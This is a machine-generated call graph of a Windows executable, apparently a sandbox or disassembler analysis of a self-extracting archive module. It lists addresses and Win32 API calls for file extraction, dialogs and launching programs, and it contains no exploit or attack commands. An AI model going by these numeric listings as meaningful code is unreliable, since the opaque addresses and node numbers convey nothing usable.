23931 50e617 53 API calls 23925->23931 23926->23899 23936 51b8e6 GetMessageW 23926->23936 24157 51abab GetClassNameW 23928->24157 23929->23928 23937 51b9d1 23931->23937 23932 51be55 23934 50e617 53 API calls 23932->23934 23933 51b862 23933->23899 23940 51c1fc SetDlgItemTextW 23933->23940 23939 51be65 SetDlgItemTextW 23934->23939 23936->23899 23942 51b8fd IsDialogMessageW 23936->23942 24177 51d4d4 23937->24177 23947 50e617 53 API calls 23938->23947 23944 51be79 23939->23944 23940->23899 23942->23926 23946 51b90c TranslateMessage DispatchMessageW 23942->23946 23949 50e617 53 API calls 23944->23949 23946->23926 23948 51ba17 23947->23948 23951 504092 _swprintf 51 API calls 23948->23951 23980 51be9c _wcslen 23949->23980 23950 51bff0 23953 51c020 23950->23953 23957 50e617 53 API calls 23950->23957 23956 51ba29 23951->23956 23952 51c73f 98 API calls 23952->23950 23959 51c73f 98 API calls 23953->23959 24000 51c0d8 23953->24000 23954 51b9d9 24075 50a0b1 23954->24075 23961 51d4d4 16 API calls 23956->23961 23962 51c003 SetDlgItemTextW 23957->23962 23965 51c03b 23959->23965 23960 51c18b 23967 51c194 EnableWindow 23960->23967 23968 51c19d 23960->23968 23961->23954 23970 50e617 53 API calls 23962->23970 23963 51ba68 GetLastError 23964 51ba73 23963->23964 24081 51ac04 SetCurrentDirectoryW 23964->24081 23975 51c04d 23965->23975 24005 51c072 23965->24005 23967->23968 23973 51c1ba 23968->23973 24195 5012d3 GetDlgItem KiUserCallbackDispatcher 23968->24195 23969 51beed 23971 50e617 53 API calls 23969->23971 23974 51c017 SetDlgItemTextW 23970->23974 23971->23899 23972 51ba87 23976 51ba9e 23972->23976 23977 51ba90 GetLastError 23972->23977 23981 51c1e1 23973->23981 23990 51c1d9 SendMessageW 23973->23990 23974->23953 24193 519ed5 32 API calls 23975->24193 23984 51bb11 23976->23984 23986 51bb20 23976->23986 23992 51baae GetTickCount 23976->23992 23977->23976 23978 51c0cb 23982 51c73f 98 API calls 23978->23982 23980->23969 23993 50e617 53 API calls 23980->23993 23981->23899 23991 50e617 53 API calls 23981->23991 23982->24000 23984->23986 23987 51bd56 23984->23987 23985 51c1b0 24196 5012d3 GetDlgItem KiUserCallbackDispatcher 23985->24196 23995 51bcfb 23986->23995 23996 51bcf1 23986->23996 23997 51bb39 GetModuleFileNameW 23986->23997 24097 5012f1 GetDlgItem ShowWindow 23987->24097 23988 51c066 23988->24005 23990->23981 23991->23933 23999 504092 _swprintf 51 API calls 23992->23999 24001 51bed0 23993->24001 23994 51c169 24194 519ed5 32 API calls 23994->24194 24004 50e617 53 API calls 23995->24004 23996->23907 23996->23995 24187 50f28c 82 API calls 23997->24187 24007 51bac7 23999->24007 24000->23960 24000->23994 24009 50e617 53 API calls 24000->24009 24008 504092 _swprintf 51 API calls 24001->24008 24012 51bd05 24004->24012 24005->23978 24013 51c73f 98 API calls 24005->24013 24006 51bd66 24098 5012f1 GetDlgItem ShowWindow 24006->24098 24082 50966e 24007->24082 24008->23969 24009->24000 24010 51c188 24010->23960 24011 51bb5f 24015 504092 _swprintf 51 API calls 24011->24015 24016 504092 _swprintf 51 API calls 24012->24016 24017 51c0a0 24013->24017 24019 51bb81 CreateFileMappingW 24015->24019 24020 51bd23 24016->24020 24017->23978 24021 51c0a9 DialogBoxParamW 24017->24021 24018 51bd70 24022 50e617 53 API calls 24018->24022 24024 51bbe3 GetCommandLineW 24019->24024 24059 51bc60 __InternalCxxFrameHandler 24019->24059 24033 50e617 53 API calls 24020->24033 24021->23907 24021->23978 24025 51bd7a SetDlgItemTextW 24022->24025 24027 51bbf4 24024->24027 24099 5012f1 GetDlgItem ShowWindow 24025->24099 24026 51baed 24030 51baff 24026->24030 24031 51baf4 GetLastError 24026->24031 24188 51b425 SHGetMalloc 24027->24188 24029 51bc6b ShellExecuteExW 24044 51bc88 24029->24044 24090 50959a 24030->24090 24031->24030 24036 51bd3d 24033->24036 24035 51bd8c SetDlgItemTextW GetDlgItem 24038 51bdc1 24035->24038 24039 51bda9 GetWindowLongW SetWindowLongW 24035->24039 24037 51bc10 24189 51b425 SHGetMalloc 24037->24189 24100 51c73f 24038->24100 24039->24038 24042 51bc1c 24190 51b425 SHGetMalloc 24042->24190 24046 51bccb 24044->24046 24047 51bc9d WaitForInputIdle 24044->24047 24045 51c73f 98 API calls 24049 51bddd 24045->24049 24046->23996 24054 51bce1 UnmapViewOfFile CloseHandle 24046->24054 24050 51bcb2 24047->24050 24126 51da52 24049->24126 24050->24046 24053 51bcb7 Sleep 24050->24053 24051 51bc28 24191 50f3fa 82 API calls 2 library calls 24051->24191 24053->24046 24053->24050 24054->23996 24057 51bc3f MapViewOfFile 24057->24059 24058 51c73f 98 API calls 24062 51be03 24058->24062 24059->24029 24060 51be2c 24192 5012d3 GetDlgItem KiUserCallbackDispatcher 24060->24192 24062->24060 24064 51c73f 98 API calls 24062->24064 24063->23907 24063->23932 24064->24060 24066 501378 24065->24066 24068 50131f 24065->24068 24198 50e2c1 GetWindowLongW SetWindowLongW 24066->24198 24067 501385 24067->23899 24067->23900 24067->23901 24068->24067 24197 50e2e8 62 API calls 2 library calls 24068->24197 24071 501341 24071->24067 24072 501354 GetDlgItem 24071->24072 24072->24067 24073 501364 24072->24073 24073->24067 24074 50136a SetWindowTextW 24073->24074 24074->24067 24076 50a0bb 24075->24076 24077 50a14c 24076->24077 24080 50a175 24076->24080 24199 50a2b2 24076->24199 24078 50a2b2 8 API calls 24077->24078 24077->24080 24078->24080 24080->23963 24080->23964 24081->23972 24083 509678 24082->24083 24084 5096d5 CreateFileW 24083->24084 24085 5096c9 24083->24085 24084->24085 24086 50971f 24085->24086 24087 50bb03 GetCurrentDirectoryW 24085->24087 24086->24026 24088 509704 24087->24088 24088->24086 24089 509708 CreateFileW 24088->24089 24089->24086 24091 5095cf 24090->24091 24092 5095be 24090->24092 24091->23984 24092->24091 24093 5095d1 24092->24093 24094 5095ca 24092->24094 24225 509620 24093->24225 24220 50974e 24094->24220 24097->24006 24098->24018 24099->24035 24101 51c749 __EH_prolog 24100->24101 24102 51bdcf 24101->24102 24240 51b314 ExpandEnvironmentStringsW 24101->24240 24102->24045 24106 51ca67 SetWindowTextW 24112 51c780 _wcslen _wcsrchr 24106->24112 24109 523e3e 22 API calls 24109->24112 24111 51c855 SetFileAttributesW 24114 51c90f GetFileAttributesW 24111->24114 24124 51c86f _abort _wcslen 24111->24124 24112->24102 24112->24106 24112->24109 24112->24111 24112->24124 24241 511fbb CompareStringW 24112->24241 24242 51a64d GetCurrentDirectoryW 24112->24242 24244 50a5d1 6 API calls 24112->24244 24245 50a55a FindClose 24112->24245 24246 51b48e 76 API calls 2 library calls 24112->24246 24247 51b314 ExpandEnvironmentStringsW 24112->24247 24114->24112 24116 51c921 DeleteFileW 24114->24116 24116->24112 24118 51c932 24116->24118 24117 51cc31 GetDlgItem SetWindowTextW SendMessageW 24117->24124 24119 504092 _swprintf 51 API calls 24118->24119 24120 51c952 GetFileAttributesW 24119->24120 24120->24118 24122 51c967 MoveFileW 24120->24122 24121 51cc71 SendMessageW 24121->24112 24122->24112 24123 51c97f MoveFileExW 24122->24123 24123->24112 24124->24112 24124->24117 24124->24121 24125 51c8eb SHFileOperationW 24124->24125 24243 50b991 51 API calls 3 library calls 24124->24243 24125->24114 24127 51da5c __EH_prolog 24126->24127 24248 510659 24127->24248 24129 51da8d 24252 505b3d 24129->24252 24131 51daab 24256 507b0d 24131->24256 24135 51dafe 24272 507b9e 24135->24272 24137 51bdee 24137->24058 24139 51d6a8 24138->24139 24771 51a5c6 24139->24771 24142 51d6b5 GetWindow 24143 51bf15 24142->24143 24146 51d6d5 24142->24146 24143->23909 24143->23910 24144 51d6e2 GetClassNameW 24776 511fbb CompareStringW 24144->24776 24146->24143 24146->24144 24147 51d706 GetWindowLongW 24146->24147 24148 51d76a GetWindow 24146->24148 24147->24148 24149 51d716 SendMessageW 24147->24149 24148->24143 24148->24146 24149->24148 24150 51d72c GetObjectW 24149->24150 24777 51a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24150->24777 24152 51d743 24778 51a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24152->24778 24779 51a80c 8 API calls 24152->24779 24155 51d754 SendMessageW DeleteObject 24155->24148 24156->23924 24158 51abf1 24157->24158 24159 51abcc 24157->24159 24163 51b093 24158->24163 24782 511fbb CompareStringW 24159->24782 24161 51abdf 24161->24158 24162 51abe3 FindWindowExW 24161->24162 24162->24158 24164 51b09d __EH_prolog 24163->24164 24165 5013dc 84 API calls 24164->24165 24166 51b0bf 24165->24166 24783 501fdc 24166->24783 24169 51b0d9 24172 501692 86 API calls 24169->24172 24170 51b0eb 24171 5019af 129 API calls 24170->24171 24175 51b10d __InternalCxxFrameHandler ___std_exception_copy 24171->24175 24173 51b0e4 24172->24173 24173->23950 24173->23952 24174 501692 86 API calls 24174->24173 24175->24174 24176->23933 24178 51b568 5 API calls 24177->24178 24179 51d4e0 GetDlgItem 24178->24179 24180 51d502 24179->24180 24181 51d536 SendMessageW SendMessageW 24179->24181 24186 51d50d ShowWindow SendMessageW SendMessageW 24180->24186 24182 51d591 SendMessageW SendMessageW SendMessageW 24181->24182 24183 51d572 24181->24183 24184 51d5c4 SendMessageW 24182->24184 24185 51d5e7 SendMessageW 24182->24185 24183->24182 24184->24185 24185->23954 24186->24181 24187->24011 24188->24037 24189->24042 24190->24051 24191->24057 24192->24063 24193->23988 24194->24010 24195->23985 24196->23973 24197->24071 24198->24067 24200 50a2bf 24199->24200 24201 50a2e3 24200->24201 24202 50a2d6 CreateDirectoryW 24200->24202 24203 50a231 3 API calls 24201->24203 24202->24201 24207 50a316 24202->24207 24204 50a2e9 24203->24204 24205 50a329 GetLastError 24204->24205 24209 50bb03 GetCurrentDirectoryW 24204->24209 24206 50a325 24205->24206 24206->24076 24207->24206 24212 50a4ed 24207->24212 24210 50a2ff 24209->24210 24210->24205 24211 50a303 CreateDirectoryW 24210->24211 24211->24205 24211->24207 24213 51ec50 24212->24213 24214 50a4fa SetFileAttributesW 24213->24214 24215 50a510 24214->24215 24216 50a53d 24214->24216 24217 50bb03 GetCurrentDirectoryW 24215->24217 24216->24206 24218 50a524 24217->24218 24218->24216 24219 50a528 SetFileAttributesW 24218->24219 24219->24216 24221 509781 24220->24221 24222 509757 24220->24222 24221->24091 24222->24221 24231 50a1e0 24222->24231 24226 50962c 24225->24226 24227 50964a 24225->24227 24226->24227 24229 509638 FindCloseChangeNotification 24226->24229 24228 509669 24227->24228 24239 506bd5 76 API calls 24227->24239 24228->24091 24229->24227 24232 51ec50 24231->24232 24233 50a1ed DeleteFileW 24232->24233 24234 50a200 24233->24234 24235 50977f 24233->24235 24236 50bb03 GetCurrentDirectoryW 24234->24236 24235->24091 24237 50a214 24236->24237 24237->24235 24238 50a218 DeleteFileW 24237->24238 24238->24235 24239->24228 24240->24112 24241->24112 24242->24112 24243->24124 24244->24112 24245->24112 24246->24112 24247->24112 24249 510666 _wcslen 24248->24249 24276 5017e9 24249->24276 24251 51067e 24251->24129 24253 510659 _wcslen 24252->24253 24254 5017e9 78 API calls 24253->24254 24255 51067e 24254->24255 24255->24131 24257 507b17 __EH_prolog 24256->24257 24293 50ce40 24257->24293 24259 507b32 24299 51eb38 24259->24299 24261 507b5c 24308 514a76 24261->24308 24264 507c7d 24265 507c87 24264->24265 24268 507cf1 24265->24268 24340 50a56d 24265->24340 24267 507d92 24267->24135 24269 507d50 24268->24269 24318 508284 24268->24318 24269->24267 24346 50138b 74 API calls 24269->24346 24273 507bac 24272->24273 24275 507bb3 24272->24275 24274 512297 86 API calls 24273->24274 24274->24275 24277 5017ff 24276->24277 24288 50185a __InternalCxxFrameHandler 24276->24288 24278 501828 24277->24278 24289 506c36 76 API calls __vswprintf_c_l 24277->24289 24280 501887 24278->24280 24285 501847 ___std_exception_copy 24278->24285 24282 523e3e 22 API calls 24280->24282 24281 50181e 24290 506ca7 75 API calls 24281->24290 24284 50188e 24282->24284 24284->24288 24292 506ca7 75 API calls 24284->24292 24285->24288 24291 506ca7 75 API calls 24285->24291 24288->24251 24289->24281 24290->24278 24291->24288 24292->24288 24294 50ce4a __EH_prolog 24293->24294 24295 51eb38 8 API calls 24294->24295 24296 50ce8d 24295->24296 24297 51eb38 8 API calls 24296->24297 24298 50ceb1 24297->24298 24298->24259 24300 51eb3d ___std_exception_copy 24299->24300 24301 51eb57 24300->24301 24304 51eb59 24300->24304 24314 527a5e 7 API calls 2 library calls 24300->24314 24301->24261 24303 51f5c9 24316 52238d RaiseException 24303->24316 24304->24303 24315 52238d RaiseException 24304->24315 24307 51f5e6 24309 514a80 __EH_prolog 24308->24309 24310 51eb38 8 API calls 24309->24310 24311 514a9c 24310->24311 24312 507b8b 24311->24312 24317 510e46 80 API calls 24311->24317 24312->24264 24314->24300 24315->24303 24316->24307 24317->24312 24319 50828e __EH_prolog 24318->24319 24347 5013dc 24319->24347 24321 5082aa 24322 5082bb 24321->24322 24490 509f42 24321->24490 24325 5082f2 24322->24325 24355 501a04 24322->24355 24486 501692 24325->24486 24328 508389 24374 508430 24328->24374 24331 5083e8 24382 501f6d 24331->24382 24335 5082ee 24335->24325 24335->24328 24338 50a56d 7 API calls 24335->24338 24494 50c0c5 CompareStringW _wcslen 24335->24494 24336 5083f3 24336->24325 24386 503b2d 24336->24386 24398 50848e 24336->24398 24338->24335 24341 50a582 24340->24341 24345 50a5b0 24341->24345 24760 50a69b 24341->24760 24343 50a592 24344 50a597 FindClose 24343->24344 24343->24345 24344->24345 24345->24265 24346->24267 24348 5013e1 __EH_prolog 24347->24348 24349 50ce40 8 API calls 24348->24349 24350 501419 24349->24350 24351 51eb38 8 API calls 24350->24351 24354 501474 _abort 24350->24354 24352 501461 24351->24352 24353 50b505 84 API calls 24352->24353 24352->24354 24353->24354 24354->24321 24357 501a0e __EH_prolog 24355->24357 24356 501b9b 24356->24335 24357->24356 24369 501a61 24357->24369 24495 5013ba 24357->24495 24359 501bc7 24498 50138b 74 API calls 24359->24498 24362 503b2d 102 API calls 24365 501c12 24362->24365 24363 501bd4 24363->24356 24363->24362 24364 501c5a 24364->24356 24368 501c8d 24364->24368 24499 50138b 74 API calls 24364->24499 24365->24364 24367 503b2d 102 API calls 24365->24367 24367->24365 24368->24356 24372 509e80 79 API calls 24368->24372 24369->24356 24369->24359 24369->24363 24370 503b2d 102 API calls 24371 501cde 24370->24371 24371->24356 24371->24370 24372->24371 24373 509e80 79 API calls 24373->24369 24517 50cf3d 24374->24517 24376 508440 24521 5113d2 GetSystemTime SystemTimeToFileTime 24376->24521 24378 5083a3 24378->24331 24379 511b66 24378->24379 24522 51de6b 24379->24522 24383 501f72 __EH_prolog 24382->24383 24385 501fa6 24383->24385 24530 5019af 24383->24530 24385->24336 24387 503b39 24386->24387 24388 503b3d 24386->24388 24387->24336 24397 509e80 79 API calls 24388->24397 24389 503b4f 24390 503b78 24389->24390 24391 503b6a 24389->24391 24684 50286b 102 API calls 3 library calls 24390->24684 24396 503baa 24391->24396 24683 5032f7 90 API calls 2 library calls 24391->24683 24394 503b76 24394->24396 24685 5020d7 74 API calls 24394->24685 24396->24336 24397->24389 24399 508498 __EH_prolog 24398->24399 24402 5084d5 24399->24402 24417 508513 24399->24417 24710 518c8d 104 API calls 24399->24710 24401 5084f5 24403 5084fa 24401->24403 24404 50851c 24401->24404 24402->24401 24406 50857a 24402->24406 24402->24417 24403->24417 24711 507a0d 153 API calls 24403->24711 24404->24417 24712 518c8d 104 API calls 24404->24712 24406->24417 24686 505d1a 24406->24686 24409 508605 24409->24417 24692 508167 24409->24692 24412 508797 24413 50a56d 7 API calls 24412->24413 24415 508802 24412->24415 24413->24415 24414 50d051 82 API calls 24423 50885d 24414->24423 24698 507c0d 24415->24698 24417->24336 24418 50898b 24715 502021 74 API calls 24418->24715 24419 508992 24420 508a5f 24419->24420 24425 5089e1 24419->24425 24424 508ab6 24420->24424 24437 508a6a 24420->24437 24423->24414 24423->24417 24423->24418 24423->24419 24713 508117 85 API calls 24423->24713 24714 502021 74 API calls 24423->24714 24432 508a4c 24424->24432 24718 507fc0 97 API calls 24424->24718 24429 50a231 3 API calls 24425->24429 24425->24432 24434 508b14 24425->24434 24426 509105 24431 50959a 80 API calls 24426->24431 24427 508ab4 24428 50959a 80 API calls 24427->24428 24428->24417 24433 508a19 24429->24433 24431->24417 24432->24427 24432->24434 24433->24432 24716 5092a3 97 API calls 24433->24716 24434->24426 24446 508b82 24434->24446 24719 5098bc 24434->24719 24435 50ab1a 8 API calls 24438 508bd1 24435->24438 24437->24427 24717 507db2 101 API calls 24437->24717 24441 50ab1a 8 API calls 24438->24441 24458 508be7 24441->24458 24444 508b70 24723 506e98 77 API calls 24444->24723 24446->24435 24447 508cbc 24448 508e40 24447->24448 24449 508d18 24447->24449 24452 508e52 24448->24452 24453 508e66 24448->24453 24472 508d49 24448->24472 24450 508d8a 24449->24450 24451 508d28 24449->24451 24460 508167 19 API calls 24450->24460 24455 508d6e 24451->24455 24463 508d37 24451->24463 24456 509215 124 API calls 24452->24456 24454 513377 75 API calls 24453->24454 24457 508e7f 24454->24457 24455->24472 24726 5077b8 111 API calls 24455->24726 24456->24472 24461 513020 124 API calls 24457->24461 24458->24447 24459 508c93 24458->24459 24466 50981a 79 API calls 24458->24466 24459->24447 24724 509a3c 82 API calls 24459->24724 24464 508dbd 24460->24464 24461->24472 24725 502021 74 API calls 24463->24725 24468 508df5 24464->24468 24469 508de6 24464->24469 24464->24472 24466->24459 24728 509155 93 API calls __EH_prolog 24468->24728 24727 507542 85 API calls 24469->24727 24475 508f85 24472->24475 24729 502021 74 API calls 24472->24729 24474 509090 24474->24426 24476 50a4ed 3 API calls 24474->24476 24475->24426 24475->24474 24477 50903e 24475->24477 24704 509f09 SetEndOfFile 24475->24704 24478 5090eb 24476->24478 24705 509da2 24477->24705 24478->24426 24730 502021 74 API calls 24478->24730 24481 509085 24483 509620 77 API calls 24481->24483 24483->24474 24484 5090fb 24731 506dcb 76 API calls _wcschr 24484->24731 24487 5016a4 24486->24487 24747 50cee1 24487->24747 24492 509f59 24490->24492 24491 509f63 24491->24322 24492->24491 24759 506d0c 78 API calls 24492->24759 24494->24335 24500 501732 24495->24500 24497 5013d6 24497->24373 24498->24356 24499->24368 24501 501748 24500->24501 24512 5017a0 __InternalCxxFrameHandler 24500->24512 24502 501771 24501->24502 24513 506c36 76 API calls __vswprintf_c_l 24501->24513 24504 5017c7 24502->24504 24509 50178d ___std_exception_copy 24502->24509 24506 523e3e 22 API calls 24504->24506 24505 501767 24514 506ca7 75 API calls 24505->24514 24508 5017ce 24506->24508 24508->24512 24516 506ca7 75 API calls 24508->24516 24509->24512 24515 506ca7 75 API calls 24509->24515 24512->24497 24513->24505 24514->24502 24515->24512 24516->24512 24518 50cf4d 24517->24518 24520 50cf54 24517->24520 24519 50981a 79 API calls 24518->24519 24519->24520 24520->24376 24521->24378 24523 51de78 24522->24523 24524 50e617 53 API calls 24523->24524 24525 51de9b 24524->24525 24526 504092 _swprintf 51 API calls 24525->24526 24527 51dead 24526->24527 24528 51d4d4 16 API calls 24527->24528 24529 511b7c 24528->24529 24529->24331 24531 5019bf 24530->24531 24533 5019bb 24530->24533 24534 5018f6 24531->24534 24533->24385 24535 501908 24534->24535 24536 501945 24534->24536 24537 503b2d 102 API calls 24535->24537 24542 503fa3 24536->24542 24540 501928 24537->24540 24540->24533 24545 503fac 24542->24545 24543 503b2d 102 API calls 24543->24545 24544 501966 24544->24540 24547 501e50 24544->24547 24545->24543 24545->24544 24559 510e08 24545->24559 24548 501e5a __EH_prolog 24547->24548 24567 503bba 24548->24567 24550 501e84 24551 501732 78 API calls 24550->24551 24554 501f0b 24550->24554 24552 501e9b 24551->24552 24595 5018a9 78 API calls 24552->24595 24554->24540 24555 501eb3 24557 501ebf _wcslen 24555->24557 24596 511b84 MultiByteToWideChar 24555->24596 24597 5018a9 78 API calls 24557->24597 24560 510e0f 24559->24560 24561 510e2a 24560->24561 24565 506c31 RaiseException _com_raise_error 24560->24565 24563 510e3b SetThreadExecutionState 24561->24563 24566 506c31 RaiseException _com_raise_error 24561->24566 24563->24545 24565->24561 24566->24563 24568 503bc4 __EH_prolog 24567->24568 24569 503bf6 24568->24569 24570 503bda 24568->24570 24572 503e51 24569->24572 24575 503c22 24569->24575 24623 50138b 74 API calls 24570->24623 24648 50138b 74 API calls 24572->24648 24574 503be5 24574->24550 24575->24574 24598 513377 24575->24598 24577 503ca3 24578 503d2e 24577->24578 24594 503c9a 24577->24594 24626 50d051 24577->24626 24608 50ab1a 24578->24608 24579 503c9f 24579->24577 24625 5020bd 78 API calls 24579->24625 24581 503c71 24581->24577 24581->24579 24582 503c8f 24581->24582 24624 50138b 74 API calls 24582->24624 24584 503d41 24588 503dd7 24584->24588 24589 503dc7 24584->24589 24632 513020 24588->24632 24612 509215 24589->24612 24592 503dd5 24592->24594 24641 502021 74 API calls 24592->24641 24642 512297 24594->24642 24595->24555 24596->24557 24597->24554 24599 51338c 24598->24599 24601 513396 ___std_exception_copy 24598->24601 24649 506ca7 75 API calls 24599->24649 24602 51341c 24601->24602 24603 5134c6 24601->24603 24607 513440 _abort 24601->24607 24650 5132aa 75 API calls 3 library calls 24602->24650 24651 52238d RaiseException 24603->24651 24606 5134f2 24607->24581 24609 50ab28 24608->24609 24611 50ab32 24608->24611 24610 51eb38 8 API calls 24609->24610 24610->24611 24611->24584 24613 50921f __EH_prolog 24612->24613 24652 507c64 24613->24652 24616 5013ba 78 API calls 24617 509231 24616->24617 24655 50d114 24617->24655 24619 50928a 24619->24592 24621 50d114 119 API calls 24622 509243 24621->24622 24622->24619 24622->24621 24664 50d300 97 API calls __InternalCxxFrameHandler 24622->24664 24623->24574 24624->24594 24625->24577 24627 50d072 24626->24627 24628 50d084 24626->24628 24665 50603a 82 API calls 24627->24665 24666 50603a 82 API calls 24628->24666 24631 50d07c 24631->24578 24633 513052 24632->24633 24634 513029 24632->24634 24640 513046 24633->24640 24681 51552f 124 API calls 2 library calls 24633->24681 24635 513048 24634->24635 24637 51303e 24634->24637 24634->24640 24680 51624a 119 API calls 24635->24680 24667 516cdc 24637->24667 24640->24592 24641->24594 24643 5122a1 24642->24643 24644 5122ba 24643->24644 24647 5122ce 24643->24647 24682 510eed 86 API calls 24644->24682 24646 5122c1 24646->24647 24648->24574 24649->24601 24650->24607 24651->24606 24653 50b146 GetVersionExW 24652->24653 24654 507c69 24653->24654 24654->24616 24662 50d12a __InternalCxxFrameHandler 24655->24662 24656 50d29a 24657 50d2ce 24656->24657 24658 50d0cb 6 API calls 24656->24658 24659 510e08 SetThreadExecutionState RaiseException 24657->24659 24658->24657 24661 50d291 24659->24661 24660 518c8d 104 API calls 24660->24662 24661->24622 24662->24656 24662->24660 24662->24661 24663 50ac05 91 API calls 24662->24663 24663->24662 24664->24622 24665->24631 24666->24631 24668 51359e 75 API calls 24667->24668 24669 516ced __InternalCxxFrameHandler 24668->24669 24670 50d114 119 API calls 24669->24670 24671 5170fe 24669->24671 24674 5111cf 81 API calls 24669->24674 24675 513e0b 119 API calls 24669->24675 24676 517153 119 API calls 24669->24676 24677 510f86 88 API calls 24669->24677 24678 51390d 98 API calls 24669->24678 24679 5177ef 124 API calls 24669->24679 24670->24669 24672 515202 98 API calls 24671->24672 24673 51710e __InternalCxxFrameHandler 24672->24673 24673->24640 24674->24669 24675->24669 24676->24669 24677->24669 24678->24669 24679->24669 24680->24640 24681->24640 24682->24646 24683->24394 24684->24394 24685->24396 24687 505d2a 24686->24687 24732 505c4b 24687->24732 24689 505d5d 24691 505d95 24689->24691 24737 50b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24689->24737 24691->24409 24693 508186 24692->24693 24694 508232 24693->24694 24744 50be5e 19 API calls __InternalCxxFrameHandler 24693->24744 24743 511fac CharUpperW 24694->24743 24697 50823b 24697->24412 24699 507c22 24698->24699 24700 507c5a 24699->24700 24745 506e7a 74 API calls 24699->24745 24700->24423 24702 507c52 24746 50138b 74 API calls 24702->24746 24704->24477 24706 509db3 24705->24706 24708 509dc2 24705->24708 24707 509db9 FlushFileBuffers 24706->24707 24706->24708 24707->24708 24709 509e3f SetFileTime 24708->24709 24709->24481 24710->24402 24711->24417 24712->24417 24713->24423 24714->24423 24715->24419 24716->24432 24717->24427 24718->24432 24720 508b5a 24719->24720 24721 5098c5 GetFileType 24719->24721 24720->24446 24722 502021 74 API calls 24720->24722 24721->24720 24722->24444 24723->24446 24724->24447 24725->24472 24726->24472 24727->24472 24728->24472 24729->24475 24730->24484 24731->24426 24738 505b48 24732->24738 24734 505c6c 24734->24689 24736 505b48 2 API calls 24736->24734 24737->24689 24741 505b52 24738->24741 24739 505c3a 24739->24734 24739->24736 24741->24739 24742 50b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24741->24742 24742->24741 24743->24697 24744->24694 24745->24702 24746->24700 24748 50cef2 24747->24748 24753 50a99e 24748->24753 24750 50cf24 24751 50a99e 86 API calls 24750->24751 24752 50cf2f 24751->24752 24754 50a9c1 24753->24754 24757 50a9d5 24753->24757 24758 510eed 86 API calls 24754->24758 24756 50a9c8 24756->24757 24757->24750 24758->24756 24759->24491 24761 50a6a8 24760->24761 24762 50a6c1 FindFirstFileW 24761->24762 24763 50a727 FindNextFileW 24761->24763 24764 50a6d0 24762->24764 24770 50a709 24762->24770 24765 50a732 GetLastError 24763->24765 24763->24770 24766 50bb03 GetCurrentDirectoryW 24764->24766 24765->24770 24767 50a6e0 24766->24767 24768 50a6e4 FindFirstFileW 24767->24768 24769 50a6fe GetLastError 24767->24769 24768->24769 24768->24770 24769->24770 24770->24343 24780 51a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24771->24780 24773 51a5cd 24774 51a5d9 24773->24774 24781 51a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24773->24781 24774->24142 24774->24143 24776->24146 24777->24152 24778->24152 24779->24155 24780->24773 24781->24774 24782->24161 24784 509f42 78 API calls 24783->24784 24785 501fe8 24784->24785 24786 501a04 102 API calls 24785->24786 24789 502005 24785->24789 24787 501ff5 24786->24787 24787->24789 24790 50138b 74 API calls 24787->24790 24789->24169 24789->24170 24790->24789 24791 5013e1 84 API calls 2 library calls 25551 5194e0 GetClientRect 25552 51f2e0 46 API calls __RTC_Initialize 25594 5121e0 26 API calls std::bad_exception::bad_exception 25553 52bee0 GetCommandLineA GetCommandLineW 24793 51eae7 24794 51eaf1 24793->24794 24795 51e85d ___delayLoadHelper2@8 14 API calls 24794->24795 24796 51eafe 24795->24796 25554 51f4e7 29 API calls _abort 25596 50f1e8 FreeLibrary 25598 519580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 24960 51ce87 24961 51ce90 GetTempPathW 24960->24961 24976 51c793 _wcslen _wcsrchr 24960->24976 24966 51ceb0 24961->24966 24963 504092 _swprintf 51 API calls 24963->24966 24964 51d40a 24965 50a231 3 API calls 24965->24966 24966->24963 24966->24965 24967 51cee7 SetDlgItemTextW 24966->24967 24970 51cf04 _wcschr 24967->24970 24967->24976 24969 51ca67 SetWindowTextW 24969->24976 24973 51cfea EndDialog 24970->24973 24970->24976 24973->24976 24974 523e3e 22 API calls 24974->24976 24976->24964 24976->24969 24976->24974 24977 51c855 SetFileAttributesW 24976->24977 24980 51c86f _abort _wcslen 24976->24980 24991 511fbb CompareStringW 24976->24991 24992 51a64d GetCurrentDirectoryW 24976->24992 24994 50a5d1 6 API calls 24976->24994 24995 50a55a FindClose 24976->24995 24996 51b48e 76 API calls 2 library calls 24976->24996 24997 51b314 ExpandEnvironmentStringsW 24976->24997 24979 51c90f GetFileAttributesW 24977->24979 24977->24980 24979->24976 24982 51c921 DeleteFileW 24979->24982 24980->24976 24983 51cc31 GetDlgItem SetWindowTextW SendMessageW 24980->24983 24987 51cc71 SendMessageW 24980->24987 24990 51c8eb SHFileOperationW 24980->24990 24993 50b991 51 API calls 3 library calls 24980->24993 24982->24976 24984 51c932 24982->24984 24983->24980 24985 504092 _swprintf 51 API calls 24984->24985 24986 51c952 GetFileAttributesW 24985->24986 24986->24984 24988 51c967 MoveFileW 24986->24988 24987->24976 24988->24976 24989 51c97f MoveFileExW 24988->24989 24989->24976 24990->24979 24991->24976 24992->24976 24993->24980 24994->24976 24995->24976 24996->24976 24997->24976 25557 51c793 98 API calls 4 library calls 25602 51b18d 78 API calls 25603 51b1b0 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW 25008 51f3b2 25009 51f3be __FrameHandler3::FrameUnwindToState 25008->25009 25040 51eed7 25009->25040 25011 51f3c5 25012 51f518 25011->25012 25015 51f3ef 25011->25015 25113 51f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 25012->25113 25014 51f51f 25106 527f58 25014->25106 25026 51f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 25015->25026 25051 528aed 25015->25051 25022 51f40e 25024 51f48f 25059 51f953 GetStartupInfoW _abort 25024->25059 25026->25024 25109 527af4 38 API calls 2 library calls 25026->25109 25027 51f495 25060 528a3e 51 API calls 25027->25060 25030 51f49d 25061 51df1e 25030->25061 25034 51f4b1 25034->25014 25035 51f4b5 25034->25035 25036 51f4be 25035->25036 25111 527efb 28 API calls _abort 25035->25111 25112 51f048 12 API calls ___scrt_uninitialize_crt 25036->25112 25039 51f4c6 25039->25022 25041 51eee0 25040->25041 25115 51f654 IsProcessorFeaturePresent 25041->25115 25043 51eeec 25116 522a5e 25043->25116 25045 51eef1 25046 51eef5 25045->25046 25124 528977 